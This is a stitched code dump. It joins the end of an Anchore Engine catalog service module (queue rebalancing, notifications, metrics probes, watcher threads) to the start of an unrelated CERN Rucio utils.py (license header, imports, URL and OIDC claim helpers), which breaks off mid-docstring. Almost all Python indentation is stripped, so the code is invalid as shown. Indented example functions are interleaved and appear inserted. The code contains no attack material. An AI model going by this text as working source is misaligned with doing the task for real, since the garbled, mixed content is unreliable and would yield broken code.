highest_neg_queueId = -1 * (1024 * 1000) # choose a high value in the negative space as a starting point - this needs to be a value that fits when stored as 'big integer' SQL type
for account in accounts:
userId = account['name']
if account['type'] == AccountTypes.service:
continue
if userId not in queue_rebalance:
queue_rebalance[userId] = {}
# do this in passes, for each analysis_status state
with db.session_scope() as dbsession:
dbfilter = {'analysis_status': taskstate.working_state('analyze')}
workingstate_image_records = db_catalog_image.get_byfilter(userId, session=dbsession, **dbfilter)
# first, evaluate images looking for those that have been in working state for too long and reset
for image_record in workingstate_image_records:
imageDigest = image_record['imageDigest']
if image_record['image_status'] == taskstate.complete_state('image_status'):
state_time = int(time.time()) - image_record['last_updated']
logger.debug("image in working state for (" + str(state_time) + ")s - " + str(imageDigest))
if state_time > max_working_time:
logger.warn("image has been in working state (" + str(
taskstate.working_state('analyze')) + ") for over (" + str(
max_working_time) + ") seconds - resetting and requeueing for analysis")
image_record['analysis_status'] = taskstate.reset_state('analyze')
with db.session_scope() as dbsession:
db_catalog_image.update_record(image_record, session=dbsession)
# next, look for any image in base state (not_analyzed) for queuing
with db.session_scope() as dbsession:
dbfilter = {'analysis_status': taskstate.base_state('analyze')}
basestate_image_records = db_catalog_image.get_byfilter(userId, session=dbsession, **dbfilter)
for basestate_image_record in basestate_image_records:
imageDigest = basestate_image_record['imageDigest']
image_record = basestate_image_record
if image_record['image_status'] == taskstate.complete_state('image_status'):
logger.debug("image check")
if image_record['analysis_status'] == taskstate.base_state('analyze'):
logger.debug("image in base state - " + str(imageDigest))
try:
manifest = obj_mgr.get_document(userId, 'manifest_data', image_record['imageDigest'])
except Exception as err:
logger.debug("failed to get manifest - {}".format(str(err)))
manifest = {}
try:
parent_manifest = obj_mgr.get_document(userId, 'parent_manifest_data', image_record['imageDigest'])
except Exception as err:
parent_manifest = {}
qobj = {}
qobj['userId'] = userId
qobj['imageDigest'] = image_record['imageDigest']
qobj['manifest'] = manifest
qobj['parent_manifest'] = parent_manifest
try:
q_record = q_client.is_inqueue('images_to_analyze', qobj)
if not q_record:
# queue image for analysis
priority = False
logger.debug("queued image for analysis (priority={}): {}".format(priority, str(imageDigest)))
qobj = q_client.enqueue('images_to_analyze', qobj, forcefirst=priority)
else:
logger.debug("image already queued")
# track and store the account's lowest queueId in the task queue, as well as the global highest negative space queueId across all accounts
try:
lowest_queueId = queue_rebalance[userId].get('lowest_queueId', None)
if not lowest_queueId or q_record.get('queueId') < lowest_queueId:
queue_rebalance[userId]['lowest_queueId'] = q_record.get('queueId')
if q_record.get('queueId') < 0 and q_record.get('queueId') >= highest_neg_queueId:
highest_neg_queueId = q_record.get('queueId')
except Exception as err:
logger.error("failed to store image current queueID - excpetion: {}".format(err))
except Exception as err:
logger.error("failed to check/queue image for analysis - exception: " + str(err))
# promote queued tasks into the analysis queue such that one image from each account is prioritized, to implement a simple 'fair share' across accounts
if fair_share_enabled:
try:
queue_id_updates = _perform_queue_rebalance(queue_rebalance, highest_neg_queueId)
for src,dst in queue_id_updates:
q_client.update_queueid('images_to_analyze', src_queueId=src, dst_queueId=dst)
except:
logger.exception('Ignoring errors rebalancing analysis queue')
logger.debug("FIRING DONE: " + str(watcher))
try:
kwargs['mythread']['last_return'] = handler_success
except:
pass
if anchore_engine.subsys.metrics.is_enabled() and handler_success:
anchore_engine.subsys.metrics.summary_observe('anchore_monitor_runtime_seconds', time.time() - timer,
function=watcher, status="success")
else:
anchore_engine.subsys.metrics.summary_observe('anchore_monitor_runtime_seconds', time.time() - timer,
function=watcher, status="fail")
return True
def _perform_queue_rebalance(queue_rebalance, highest_neg_queueId):
ret = []
for userId in queue_rebalance.keys():
user_lowest_queueId = queue_rebalance[userId].get('lowest_queueId', None)
if user_lowest_queueId and user_lowest_queueId > 0:
# shuffle the task into neg space
highest_neg_queueId += 1
if highest_neg_queueId <= -1:
logger.spew("prioritizing user {} image in image analysis queue for fair-share (queueId={}, new_queueId={})".format(userId, user_lowest_queueId, highest_neg_queueId))
ret.append( (user_lowest_queueId, highest_neg_queueId) )
return ret
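# A minimal sketch of how the fair-share rebalance above behaves, assuming a single
# hypothetical account whose earliest queued task still has a positive queueId.
# The account name and queueId values are illustrative only.
def _example_queue_rebalance():
    queue_rebalance = {'example_account': {'lowest_queueId': 42}}
    highest_neg_queueId = -5
    # 42 is positive, so it should be remapped just above the current highest
    # negative queueId, i.e. the expected result is [(42, -4)].
    return _perform_queue_rebalance(queue_rebalance, highest_neg_queueId)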
def handle_notifications(*args, **kwargs):
global system_user_auth
watcher = str(kwargs['mythread']['taskType'])
handler_success = True
timer = time.time()
logger.debug("FIRING: " + str(watcher))
q_client = internal_client_for(SimpleQueueClient, userId=None)
with db.session_scope() as dbsession:
mgr = manager_factory.for_session(dbsession)
localconfig = anchore_engine.configuration.localconfig.get_config()
try:
notification_timeout = int(localconfig['webhooks']['notification_retry_timeout'])
except:
notification_timeout = 30
logger.debug("notification timeout: " + str(notification_timeout))
# get the event log notification config
try:
event_log_config = localconfig.get('services', {}).get('catalog', {}).get('event_log', None)
if event_log_config and 'notification' in event_log_config:
notify_events = event_log_config.get('notification').get('enabled', False)
if notify_events and 'level' in event_log_config.get('notification'):
event_levels = event_log_config.get('notification').get('level')
event_levels = [level.lower() for level in event_levels]
else:
event_levels = None
else:
notify_events = False
event_levels = None
except:
logger.exception('Ignoring errors parsing for event_log configuration')
notify_events = False
event_levels = None
# regular event queue notifications + event log notification
event_log_type = 'event_log'
for subscription_type in anchore_engine.common.subscription_types + [event_log_type]:
logger.debug("notifier: " + subscription_type)
accounts = mgr.list_accounts(with_state=AccountStates.enabled, include_service=False)
try:
qlen = q_client.qlen(subscription_type)
except Exception as err:
logger.debug(
"problem looking for notifications in queue: " + str(subscription_type) + " - exception: " + str(
err))
qlen = 0
while qlen > 0:
pupdate_record = q_client.dequeue(subscription_type)
if pupdate_record:
logger.debug("got notification from queue: " + json.dumps(pupdate_record, indent=4))
notification = pupdate_record['data']
userId = notification['userId']
subscription_key = notification['subscription_key']
notificationId = notification['notificationId']
for account in accounts:
try:
if userId == account['name']:
notification_record = None
# new handling
subscription_type_actual = subscription_type
if notification.get('event', {}).get('details', {}).get('subscription_type', None) in anchore_engine.common.subscription_types:
subscription_type_actual = notification.get('event', {}).get('details', {}).get('subscription_type')
subscription_key_actual = notification.get('event', {}).get('resource', {}).get('id')
dbfilter = {
'subscription_type': subscription_type_actual,
'subscription_key': subscription_key_actual,
}
subscription_records = db_subscriptions.get_byfilter(account['name'],
session=dbsession, **dbfilter)
if subscription_records:
subscription = subscription_records[0]
if subscription and subscription['active']:
notification_transform = {
'notificationId': notification.get('notificationId'),
'userId': notification.get('userId'),
'subscription_key': subscription_key_actual,
}
notification_transform.update(notification.get('event', {}).get('details', {}))
notification_record = notifications.make_notification(account,
subscription_type_actual,
notification_transform)
else:
if notify_events and (
event_levels is None or subscription_key.lower() in event_levels):
notification.pop('subscription_key',
None) # remove subscription_key property from notification
notification_record = notifications.make_notification(account, subscription_type,
notification)
if notification_record:
logger.spew("Storing NOTIFICATION: {} - {} - {}".format(account, notification_record, subscription_type))
db_queues.add(subscription_type_actual, userId, notificationId, notification_record, 0,
int(time.time() + notification_timeout), session=dbsession)
except Exception as err:
import traceback
traceback.print_exc()
logger.warn("cannot store notification to DB - exception: " + str(err))
qlen = q_client.qlen(subscription_type)
for account in accounts:
notification_records = db_queues.get_all(subscription_type, account['name'], session=dbsession)
for notification_record in notification_records:
logger.spew("drained to send: " + json.dumps(notification_record))
try:
rc = notifications.notify(account, notification_record)
if rc:
db_queues.delete_record(notification_record, session=dbsession)
except Exception as err:
logger.debug("failed to send notification, storing for retry - exception: " + str(err))
notification_record['tries'] = int(time.time())
if notification_record['tries'] > notification_record['max_tries']:
logger.error("hit max notification timeout: dropping notificaion")
db_queues.delete_record(notification_record, session=dbsession)
else:
db_queues.update_record(notification_record, session=dbsession)
logger.debug("FIRING DONE: " + str(watcher))
try:
kwargs['mythread']['last_return'] = handler_success
except:
pass
if anchore_engine.subsys.metrics.is_enabled() and handler_success:
anchore_engine.subsys.metrics.summary_observe('anchore_monitor_runtime_seconds', time.time() - timer,
function=watcher, status="success")
else:
anchore_engine.subsys.metrics.summary_observe('anchore_monitor_runtime_seconds', time.time() - timer,
function=watcher, status="fail")
return True
def handle_metrics(*args, **kwargs):
cycle_timer = kwargs['mythread']['cycle_timer']
while True:
# perform some DB read/writes for metrics gathering
if anchore_engine.subsys.metrics.is_enabled():
# DB probes
anchore_record = None
try:
with anchore_engine.subsys.metrics.get_summary_obj("anchore_db_read_seconds").time() as mtimer:
with db.session_scope() as dbsession:
anchore_record = db_anchore.get(session=dbsession)
except Exception as err:
logger.warn("unable to perform DB read probe - exception: " + str(err))
if anchore_record:
try:
with anchore_engine.subsys.metrics.get_summary_obj("anchore_db_write_seconds").time() as mtimer:
with db.session_scope() as dbsession:
anchore_record['record_state_val'] = str(time.time())
rc = db_anchore.update_record(anchore_record, session=dbsession)
except Exception as err:
logger.warn("unable to perform DB write probe - exception: " + str(err))
try:
with anchore_engine.subsys.metrics.get_summary_obj("anchore_db_readwrite_seconds").time() as mtimer:
with db.session_scope() as dbsession:
anchore_record = db_anchore.get(session=dbsession)
anchore_record['record_state_val'] = str(time.time())
rc = db_anchore.update_record(anchore_record, session=dbsession)
except Exception as err:
logger.warn("unable to perform DB read/write probe - exception: " + str(err))
# FS probes
localconfig = anchore_engine.configuration.localconfig.get_config()
try:
tmpdir = localconfig['tmp_dir']
svfs = os.statvfs(tmpdir)
available_bytes = svfs.f_bsize * svfs.f_bavail
anchore_engine.subsys.metrics.gauge_set("anchore_tmpspace_available_bytes", available_bytes)
except Exception as err:
logger.warn("unable to detect available bytes probe - exception: " + str(err))
time.sleep(cycle_timer)
def handle_archive_tasks(*args, **kwargs):
"""
Handles periodic scan tasks for archive rule processing
:param args:
:param kwargs:
:return:
"""
watcher = str(kwargs['mythread']['taskType'])
start_time = time.time()
logger.debug("FIRING: " + str(watcher))
task_id = None
account_names = []
try:
logger.info('Starting analysis archive transition rule processor')
with db.session_scope() as session:
# Get all enabled accounts
mgr = manager_factory.for_session(session)
accounts = mgr.list_accounts(with_state=AccountStates.enabled, include_service=False)
if accounts:
account_names = [x['name'] for x in accounts]
logger.debug('Found accounts {} with transition rules'.format(accounts))
for account in account_names:
task = archiver.ArchiveTransitionTask(account)
task_id = task.task_id
logger.info('Starting archive transition task {} for account {}'.format(task.task_id, account))
task.run()
logger.info('Archive transition task {} complete'.format(task.task_id))
except Exception:
logger.exception('Caught unexpected exception')
finally:
logger.debug('Analysis archive task {} execution time: {} seconds'.format(task_id, time.time() - start_time))
logger.debug('Sleeping until next cycle since no messages to process')
return True
click = 0
running = False
last_run = 0
system_user_auth = ('anchore-system', '')
# policy update check data
feed_sync_updated = False
bundle_user_last_updated = {}
bundle_user_is_updated = {}
default_lease_ttl = 60 # 1 hour ttl, should be more than enough in most cases
def watcher_func(*args, **kwargs):
global system_user_auth
while True:
logger.debug("starting generic watcher")
all_ready = anchore_engine.clients.services.common.check_services_ready(['simplequeue'])
if not all_ready:
logger.info("simplequeue service not yet ready, will retry")
else:
q_client = internal_client_for(SimpleQueueClient, userId=None)
lease_id = None
try:
logger.debug("attempting dequeue")
qobj = q_client.dequeue('watcher_tasks', max_wait_seconds=30)
logger.debug("dequeue complete")
if qobj:
logger.debug("got task from queue: " + str(qobj))
watcher = qobj['data']['watcher']
handler = watchers[watcher]['handler']
args = []
kwargs = {'mythread': watchers[watcher]}
lease_id = watchers[watcher]['task_lease_id']
# Old way
timer = time.time()
if not lease_id:
logger.debug(
'No task lease defined for watcher {}, initiating without lock protection'.format(watcher))
rc = handler(*args, **kwargs)
else:
rc = simplequeue.run_target_with_lease(None, lease_id, handler,
ttl=default_lease_ttl, *args, **kwargs)
else:
logger.debug("nothing in queue")
except (simplequeue.LeaseAcquisitionFailedError, simplequeue.LeaseUnavailableError) as e:
logger.debug('Lease acquisition could not complete, but this is probably due to another process with the lease: {}'.format(e))
except Exception as err:
logger.warn("failed to process task this cycle: " + str(err))
logger.debug("generic watcher done")
time.sleep(5)
def schedule_watcher(watcher):
global watchers, watcher_task_template, system_user_auth
if watcher not in watchers:
logger.warn("input watcher {} not in list of available watchers {}".format(watcher, list(watchers.keys())))
return False
if watchers[watcher]['taskType']:
logger.debug("should queue job: " + watcher)
watcher_task = copy.deepcopy(watcher_task_template)
watcher_task['watcher'] = watcher
watcher_task['taskType'] = watchers[watcher]['taskType']
try:
q_client = internal_client_for(SimpleQueueClient, userId=None)
if not q_client.is_inqueue('watcher_tasks', watcher_task):
qobj = q_client.enqueue('watcher_tasks', watcher_task)
logger.debug(str(watcher_task) + ": init task queued: " + str(qobj))
else:
logger.debug(str(watcher_task) + ": init task already queued")
watchers[watcher]['last_queued'] = time.time()
except Exception as err:
logger.warn("failed to enqueue watcher task: " + str(err))
return True
def monitor_func(**kwargs):
global click, running, last_queued, system_user_auth, watchers, last_run
if click < 5:
click = click + 1
logger.debug("Catalog monitor starting in: " + str(5 - click))
return True
if running or ((time.time() - last_run) < kwargs['kick_timer']):
return True
logger.debug("FIRING: catalog_monitor")
try:
localconfig = anchore_engine.configuration.localconfig.get_config()
system_user_auth = localconfig['system_user_auth']
for watcher in list(watchers.keys()):
if not watchers[watcher]['initialized']:
# first time
if 'cycle_timers' in kwargs and watcher in kwargs['cycle_timers']:
try:
the_cycle_timer = watchers[watcher]['cycle_timer']
min_cycle_timer = watchers[watcher]['min_cycle_timer']
max_cycle_timer = watchers[watcher]['max_cycle_timer']
config_cycle_timer = int(kwargs['cycle_timers'][watcher])
if config_cycle_timer < 0:
the_cycle_timer = abs(int(config_cycle_timer))
elif config_cycle_timer == 0:
watchers[watcher]['enabled'] = False
logger.debug("watcher '{}' has been explicitly disabled in config".format(watcher))
elif config_cycle_timer < min_cycle_timer:
logger.warn("configured cycle timer for handler (" + str(
watcher) + ") is less than the allowed min (" + str(
min_cycle_timer) + ") - using allowed min")
the_cycle_timer = min_cycle_timer
elif config_cycle_timer > max_cycle_timer:
logger.warn("configured cycle timer for handler (" + str(
watcher) + ") is greater than the allowed max (" + str(
max_cycle_timer) + ") - using allowed max")
the_cycle_timer = max_cycle_timer
else:
the_cycle_timer = config_cycle_timer
watchers[watcher]['cycle_timer'] = the_cycle_timer
except Exception as err:
logger.warn(
"exception setting custom cycle timer for handler (" + str(watcher) + ") - using default")
watchers[watcher]['initialized'] = True
if watchers[watcher].get('enabled', True):
if watcher not in watcher_threads:
if watchers[watcher]['taskType']:
# spin up a generic task watcher
logger.debug("starting generic task thread")
watcher_threads[watcher] = threading.Thread(target=watcher_func, args=[watcher], kwargs={})
watcher_threads[watcher].start()
else:
# spin up a specific looping watcher thread
watcher_threads[watcher] = threading.Thread(target=watchers[watcher]['handler'],
args=watchers[watcher]['args'],
kwargs={'mythread': watchers[watcher]})
watcher_threads[watcher].start()
all_ready = anchore_engine.clients.services.common.check_services_ready(['simplequeue'])
if not all_ready:
logger.info("simplequeue service not yet ready, will retry")
elif time.time() - watchers[watcher]['last_queued'] > watchers[watcher]['cycle_timer']:
rc = schedule_watcher(watcher)
except Exception as err:
logger.error(str(err))
finally:
logger.debug("FIRING DONE: catalog_monitor")
running = False
last_run = time.time()
logger.debug("exiting monitor thread")
monitor_thread = None
def monitor(*args, **kwargs):
global monitor_thread
try:
donew = False
if monitor_thread:
if monitor_thread.is_alive():
logger.spew("MON: thread still running")
else:
logger.spew("MON: thread stopped running")
donew = True
monitor_thread.join()
logger.spew("MON: thread joined: isAlive=" + str(monitor_thread.isAlive()))
else:
logger.spew("MON: no thread")
donew = True
if donew:
logger.spew("MON: starting")
monitor_thread = threading.Thread(target=monitor_func, kwargs=kwargs)
monitor_thread.start()
else:
logger.spew("MON: skipping")
except Exception as err:
logger.warn("MON thread start exception: " + str(err))
class CatalogService(ApiService):
__service_name__ = 'catalog'
__spec_dir__ = pkg_resources.resource_filename(__name__, 'swagger')
__monitor_fn__ = monitor
def _register_instance_handlers(self):
super()._register_instance_handlers()
self.register_handler(LifeCycleStages.post_db, self._init_object_storage, {})
self.register_handler(LifeCycleStages.post_register, self._init_policies, {})
def _init_object_storage(self):
try:
did_init = object_store.initialize(self.configuration, manager_id=DEFAULT_OBJECT_STORE_MANAGER_ID, config_keys=[DEFAULT_OBJECT_STORE_MANAGER_ID, ALT_OBJECT_STORE_CONFIG_KEY], allow_legacy_fallback=True)
if not did_init:
logger.warn('Unexpectedly found the object store already initialized. This is not an expected condition. Continuing with driver: {}'.format(object_store.get_manager().primary_client.__config_name__))
except Exception as err:
logger.exception("Error initializing the object store: check catalog configuration")
raise err
try:
archive.initialize(self.configuration)
except Exception as err:
logger.exception("Error initializing analysis archive: check catalog configuration")
raise err
def _init_policies(self):
"""
Ensure all accounts have a default policy in place
:return:
"""
obj_mgr = object_store.get_manager()
with db.session_scope() as dbsession:
mgr = manager_factory.for_session(dbsession)
for account_dict in mgr.list_accounts(include_service=False):
try:
logger.info('Initializing a new account')
userId = account_dict['name'] # Old keys are userId, now that maps to account name
bundle_records = db_policybundle.get_all_byuserId(userId, session=dbsession)
if not bundle_records:
logger.debug("Account {} has no policy bundle - installing default".format(userId))
config = self.global_configuration
if config.get('default_bundle_file', None) and os.path.exists(config['default_bundle_file']):
logger.info("loading def bundle: " + str(config['default_bundle_file']))
try:
default_bundle = {}
with open(config['default_bundle_file'], 'r') as FH:
default_bundle = json.loads(FH.read())
if default_bundle:
bundle_url = obj_mgr.put_document(userId, 'policy_bundles', default_bundle['id'],
default_bundle)
policy_record = make_policy_record(userId, default_bundle, active=True)
rc = db_policybundle.add(policy_record['policyId'], userId, True, policy_record,
session=dbsession)
if not rc:
raise Exception("policy bundle DB add failed")
except Exception as err:
if isinstance(err, IntegrityError):
logger.warn("another process has already initialized, continuing")
else:
logger.error("could not load up default bundle for user - exception: " + str(err))
except Exception as err:
if isinstance(err, IntegrityError):
logger.warn("another process has already initialized, continuing")
else:
raise Exception("unable to initialize default user data - exception: " + str(err))
watchers = {
'image_watcher': {'handler': handle_image_watcher, 'task_lease_id': 'image_watcher',
'taskType': 'handle_image_watcher', 'args': [], 'cycle_timer': 600, 'min_cycle_timer': 300,
'max_cycle_timer': 86400 * 7, 'last_queued': 0, 'last_return': False, 'initialized': False},
'repo_watcher': {'handler': handle_repo_watcher, 'task_lease_id': 'repo_watcher', 'taskType': 'handle_repo_watcher',
'args': [], 'cycle_timer': 60, 'min_cycle_timer': 60, 'max_cycle_timer': 86400 * 7,
'last_queued': 0, 'last_return': False, 'initialized': False},
'policy_eval': {'handler': handle_policyeval, 'task_lease_id': 'policy_eval', 'taskType': 'handle_policyeval',
'args': [], 'cycle_timer': 300, 'min_cycle_timer': 60, 'max_cycle_timer': 86400 * 2,
'last_queued': 0, 'last_return': False, 'initialized': False},
'analyzer_queue': {'handler': handle_analyzer_queue, 'task_lease_id': 'analyzer_queue',
'taskType': 'handle_analyzer_queue', 'args': [], 'cycle_timer': 5, 'min_cycle_timer': 1,
'max_cycle_timer': 7200, 'last_queued': 0, 'last_return': False, 'initialized': False},
'notifications': {'handler': handle_notifications, 'task_lease_id': 'notifications',
'taskType': 'handle_notifications', 'args': [], 'cycle_timer': 10, 'min_cycle_timer': 10,
'max_cycle_timer': 86400 * 2, 'last_queued': 0, 'last_return': False, 'initialized': False},
'vulnerability_scan': {'handler': handle_vulnerability_scan, 'task_lease_id': 'vulnerability_scan',
'taskType': 'handle_vulnerability_scan', 'args': [], 'cycle_timer': 300,
'min_cycle_timer': 60, 'max_cycle_timer': 86400 * 2, 'last_queued': 0, 'last_return': False,
'initialized': False},
'account_resource_cleanup': {'handler': handle_account_resource_cleanup, 'task_lease_id': 'account_resource_cleanup',
'taskType': 'handle_account_resource_cleanup', 'args': [], 'cycle_timer': 30,
'min_cycle_timer': 30, 'max_cycle_timer': 30, 'last_queued': 0, 'last_return': False,
'initialized': False},
'service_watcher': {'handler': handle_service_watcher, 'task_lease_id': False, 'taskType': None, 'args': [],
'cycle_timer': 10, 'min_cycle_timer': 1, 'max_cycle_timer': 300, 'last_queued': 0,
'last_return': False, 'initialized': False},
'service_heartbeat': {'handler': anchore_engine.subsys.servicestatus.handle_service_heartbeat,
'task_lease_id': False, 'taskType': None, 'args': [CatalogService.__service_name__],
'cycle_timer': 60, 'min_cycle_timer': 60, 'max_cycle_timer': 60, 'last_queued': 0,
'last_return': False, 'initialized': False},
'handle_metrics': {'handler': handle_metrics, 'task_lease_id': False, 'taskType': None, 'args': [],
'cycle_timer': 60, 'min_cycle_timer': 60, 'max_cycle_timer': 60, 'last_queued': 0,
'last_return': False, 'initialized': False},
'archive_tasks': {'handler': handle_archive_tasks, 'task_lease_id': 'archive_transitions', 'taskType': 'handle_archive_tasks', 'args': [], 'cycle_timer': 43200,
'min_cycle_timer': 60, 'max_cycle_timer': 86400 * 5, 'last_queued': 0, 'last_return': False,
'initialized': False},
}
watcher_task_template = {
'taskType': None,
'watcher': None,
}
watcher_threads = {}
|
utils.py
|
# -*- coding: utf-8 -*-
# Copyright 2012-2022 CERN
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# Authors:
# - Vincent Garonne <vincent.garonne@cern.ch>, 2012-2018
# - Thomas Beermann <thomas.beermann@cern.ch>, 2012-2021
# - Mario Lassnig <mario.lassnig@cern.ch>, 2012-2021
# - Cedric Serfon <cedric.serfon@cern.ch>, 2013-2022
# - Ralph Vigne <ralph.vigne@cern.ch>, 2013
# - Joaquín Bogado <jbogado@linti.unlp.edu.ar>, 2015-2018
# - Martin Barisits <martin.barisits@cern.ch>, 2016-2022
# - Brian Bockelman <bbockelm@cse.unl.edu>, 2018
# - Tobias Wegner <twegner@cern.ch>, 2018-2019
# - Hannes Hansen <hannes.jakob.hansen@cern.ch>, 2018-2019
# - Tomas Javurek <tomas.javurek@cern.ch>, 2019-2020
# - Andrew Lister <andrew.lister@stfc.ac.uk>, 2019
# - James Perry <j.perry@epcc.ed.ac.uk>, 2019-2021
# - Gabriele Fronze' <gfronze@cern.ch>, 2019
# - Jaroslav Guenther <jaroslav.guenther@cern.ch>, 2019-2020
# - Eli Chadwick <eli.chadwick@stfc.ac.uk>, 2020
# - Patrick Austin <patrick.austin@stfc.ac.uk>, 2020
# - root <root@escape-rucio-dev-oidc-r.cern.ch>, 2020
# - Benedikt Ziemons <benedikt.ziemons@cern.ch>, 2020-2021
# - Mayank Sharma <mayank.sharma@cern.ch>, 2021
# - Rahul Chauhan <omrahulchauhan@gmail.com>, 2021
# - Radu Carpa <radu.carpa@cern.ch>, 2021-2022
# - Anil Panta <47672624+panta-123@users.noreply.github.com>, 2021
# - Ilija Vukotic <ivukotic@cern.ch>, 2021
# - David Población Criado <david.poblacion.criado@cern.ch>, 2021
# - martynia <janusz.martyniak@googlemail.com>, 2021-2022
# - jdierkes <joel.dierkes@cern.ch>, 2021
# - Rakshita Varadarajan <rakshitajps@gmail.com>, 2021
# - Rob Barnsley <robbarnsley@users.noreply.github.com>, 2021
# - Igor Mandrichenko <ivm@fnal.gov>, 2021
# - Joel Dierkes <joel.dierkes@cern.ch>, 2021
from __future__ import absolute_import, print_function
import argparse
import base64
import datetime
import errno
import getpass
import hashlib
import io
import itertools
import json
import logging
import mmap
import os
import os.path
import re
import socket
import subprocess
import tempfile
import threading
import time
import zlib
from collections import OrderedDict
from enum import Enum
from functools import partial
from uuid import uuid4 as uuid
from xml.etree import ElementTree
import requests
from six import string_types, text_type, binary_type, ensure_text, PY3
from six.moves import StringIO, zip_longest as izip_longest
from six.moves.urllib.parse import urlparse, urlencode, quote, parse_qsl, urlunparse
from six.moves.configparser import NoOptionError, NoSectionError
from rucio.common.config import config_get, config_has_section
from rucio.common.exception import MissingModuleException, InvalidType, InputValidationError, MetalinkJsonParsingError, RucioException, \
DuplicateCriteriaInDIDFilter, DIDFilterSyntaxError, InvalidAlgorithmName
from rucio.common.extra import import_extras
from rucio.common.types import InternalAccount, InternalScope
EXTRA_MODULES = import_extras(['paramiko'])
if EXTRA_MODULES['paramiko']:
try:
from paramiko import RSAKey
except Exception:
EXTRA_MODULES['paramiko'] = False
# HTTP code dictionary. Not complete. Can be extended if needed.
codes = {
# Informational.
200: '200 OK',
201: '201 Created',
202: '202 Accepted',
# Client Error.
400: '400 Bad Request',
401: '401 Unauthorized',
403: '403 Forbidden',
404: '404 Not Found',
405: '405 Method Not Allowed',
406: '406 Not Acceptable',
408: '408 Request Timeout',
409: '409 Conflict',
410: '410 Gone',
# Server Error.
500: '500 Internal Server Error',
501: '501 Not Implemented',
502: '502 Bad Gateway',
503: '503 Service Unavailable',
504: '504 Gateway Timeout'
}
# RFC 1123 (ex RFC 822)
DATE_FORMAT = '%a, %d %b %Y %H:%M:%S UTC'
def dids_as_dicts(did_list):
"""
Converts list of DIDs to list of dictionaries
:param did_list: list of DIDs as either "scope:name" or {"scope": "scope", "name": "name"}
:returns: list of dictionaries {"scope": "scope", "name": "name"}
"""
out = []
for did in did_list:
if isinstance(did, str):
scope, name = did.split(":", 1)
did = dict(scope=scope, name=name)
if isinstance(did, dict):
if not ("name" in did and "scope" in did):
raise ValueError("Scope or name missing in: %s" % (did,))
else:
raise ValueError("Can not convert item %s (%s) to a DID" % (did, type(did)))
out.append(did)
return out
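# A minimal usage sketch for dids_as_dicts; the scope/name values below are
# hypothetical examples, not taken from any real catalogue.
def _example_dids_as_dicts():
    mixed = ['user.jdoe:my.dataset', {'scope': 'mc16', 'name': 'evnt.root'}]
    # Both entries should come back normalised to {'scope': ..., 'name': ...} dicts.
    return dids_as_dicts(mixed)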
def build_url(url, path=None, params=None, doseq=False):
"""
Utility function to build a URL for requests to the Rucio system.
If the optional parameter doseq evaluates to True, individual key=value pairs
separated by '&' are generated for each element of the value sequence for the key.
"""
complete_url = url
if path is not None:
complete_url += "/" + path
if params is not None:
complete_url += "?"
if isinstance(params, str):
complete_url += quote(params)
else:
complete_url += urlencode(params, doseq=doseq)
return complete_url
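# A minimal usage sketch for build_url; the host and parameters are hypothetical.
def _example_build_url():
    # Plain dict parameters are urlencoded: .../accounts?name=jdoe
    single = build_url('https://rucio.example.org', path='accounts', params={'name': 'jdoe'})
    # With doseq=True a sequence value expands to repeated key=value pairs: .../dids?did=a&did=b
    multi = build_url('https://rucio.example.org', path='dids', params={'did': ['a', 'b']}, doseq=True)
    return single, multi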
def all_oidc_req_claims_present(scope, audience, required_scope, required_audience, sepatator=" "):
"""
Checks if both of the following statements are true:
- all items in required_scope are present in scope
- all items in required_audience are present in audience
If both conditions hold, True is returned; otherwise False.
audience and scope must either both be strings or both be lists;
the same applies to the required_* variables.
:params scope: list of strings or one string where items are separated by a separator input variable
:params audience: list of strings or one string where items are separated by a separator input variable
:params required_scope: list of strings or one string where items are separated by a separator input variable
:params required_audience: list of strings or one string where items are separated by a separator input variable
:params sepatator: separator string, space by default
:returns : True or False
"""
if not scope:
scope = ""
if not audience:
audience = ""
if not required_scope:
required_scope = ""
if not required_audience:
required_audience = ""
if (isinstance(scope, list) and isinstance(audience, list) and isinstance(required_scope, list) and isinstance(required_audience, list)):
scope = [str(it) for it in scope]
audience = [str(it) for it in audience]
required_scope = [str(it) for it in required_scope]
required_audience = [str(it) for it in required_audience]
req_scope_present = all(elem in scope for elem in required_scope)
req_audience_present = all(elem in audience for elem in required_audience)
return req_scope_present and req_audience_present
elif (isinstance(scope, string_types) and isinstance(audience, string_types) and isinstance(required_scope, string_types) and isinstance(required_audience, string_types)):
scope = str(scope)
audience = str(audience)
required_scope = str(required_scope)
required_audience = str(required_audience)
req_scope_present = all(elem in scope.split(sepatator) for elem in required_scope.split(sepatator))
req_audience_present = all(elem in audience.split(sepatator) for elem in required_audience.split(sepatator))
return req_scope_present and req_audience_present
elif (isinstance(scope, list) and isinstance(audience, list) and isinstance(required_scope, string_types) and isinstance(required_audience, string_types)):
scope = [str(it) for it in scope]
audience = [str(it) for it in audience]
required_scope = str(required_scope)
required_audience = str(required_audience)
req_scope_present = all(elem in scope for elem in required_scope.split(sepatator))
req_audience_present = all(elem in audience for elem in required_audience.split(sepatator))
return req_scope_present and req_audience_present
elif (isinstance(scope, string_types) and isinstance(audience, string_types) and isinstance(required_scope, list) and isinstance(required_audience, list)):
scope = str(scope)
audience = str(audience)
required_scope = [str(it) for it in required_scope]
required_audience = [str(it) for it in required_audience]
req_scope_present = all(elem in scope.split(sepatator) for elem in required_scope)
req_audience_present = all(elem in audience.split(sepatator) for elem in required_audience)
return req_scope_present and req_audience_present
else:
return False
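# A minimal sketch of the claim check above, using hypothetical scope/audience strings.
def _example_oidc_claims_check():
    # All required items are present, so this is expected to return True.
    ok = all_oidc_req_claims_present('openid profile wlcg', 'rucio fts', 'openid profile', 'rucio')
    # 'email' is missing from the granted scope, so this is expected to return False.
    missing = all_oidc_req_claims_present('openid profile', 'rucio', 'email', 'rucio')
    return ok, missing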
def generate_uuid():
return str(uuid()).replace('-', '').lower()
def generate_uuid_bytes():
return uuid().bytes
# GLOBALLY_SUPPORTED_CHECKSUMS = ['adler32', 'md5', 'sha256', 'crc32']
GLOBALLY_SUPPORTED_CHECKSUMS = ['adler32', 'md5']
CHECKSUM_ALGO_DICT = {}
PREFERRED_CHECKSUM = GLOBALLY_SUPPORTED_CHECKSUMS[0]
CHECKSUM_KEY = 'supported_checksums'
def is_checksum_valid(checksum_name):
"""
A simple function to check whether a checksum algorithm is supported.
